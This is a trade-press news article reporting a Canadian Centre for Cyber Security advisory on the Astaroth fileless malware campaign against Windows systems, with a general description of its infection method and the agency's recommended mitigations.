Content, Content

Astaroth Fileless Malware Targets Windows Systems

The Canadian Centre for Cyber Security (CCCS), a counterpart to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), has issued a warning about a fileless malware campaign hitting Microsoft Windows-based systems.

In the advisory, CCCS officials cautioned that the Astaroth fileless malware, which is memory resident, can be used by attackers to steal personal credentials, obtain sensitive data and track keystroke input. Astaroth is regarded as far harder to detect than traditional malware as the original infecting executable typically does not remain on the system’s hard drive.

The purpose of the advisory, the CCCS said, is to bring “heightened awareness to the increase in the detection and identification of fileless malware, including Astaroth.” In the U.S., CISA urged administrators to review the CCCS alert for potential infection vectors along with mitigation recommendations.

Astaroth gains a foothold in a victim’s system by duping the user into opening a bogus, infected file or by visiting a malicious website, in a fashion similar to incubators for many malware infections. The difference is Astaroth doesn’t deliver a payload in malware files stored on a hard drive but instead resides only in memory. Once attached, it subsequently looks to create entries in the system’s registry or attempts to load commonly used processes such as PowerShell or Windows management instrumentation. Ultimately, the infected machine may attempt to propagate on other connected devices, download additional malware on the infected device, and download and execute scripts.

"Although it is unlikely to prevent all infections, these attacks can be prevented by organizations implementing strong IT security practices that, when used together, will minimize the risk of fileless malware attacks," the agency said. The CCCS's recommended mitigations include:

  • Patch and upgrade management, including staying up to date with vendor issued security advisories and application releases.
  • Architect a layered IT defense environment including hardening of end points and disabling non-essential applications and services.
  • Strong user awareness including encouraging users to report suspicious activity and implementing cyber security training.
  • Log management including regular reviews of system logs, server logs and performing regular audits.

The CCCS is Canada's national computer security incident response team, collaborating with government agencies, critical infrastructure, Canadian businesses and international organizations to prepare for, respond to, mitigate, and recover from cyber events.

D. Howard Kass

D. Howard Kass is a contributing editor to MSSP Alert. He brings a career in journalism and market research to the role. He has served as CRN News Editor, Dataquest Channel Analyst, and West Coast Senior Contributing Editor at Channelnomics. As the CEO of The Viewpoint Group, he led groundbreaking market research.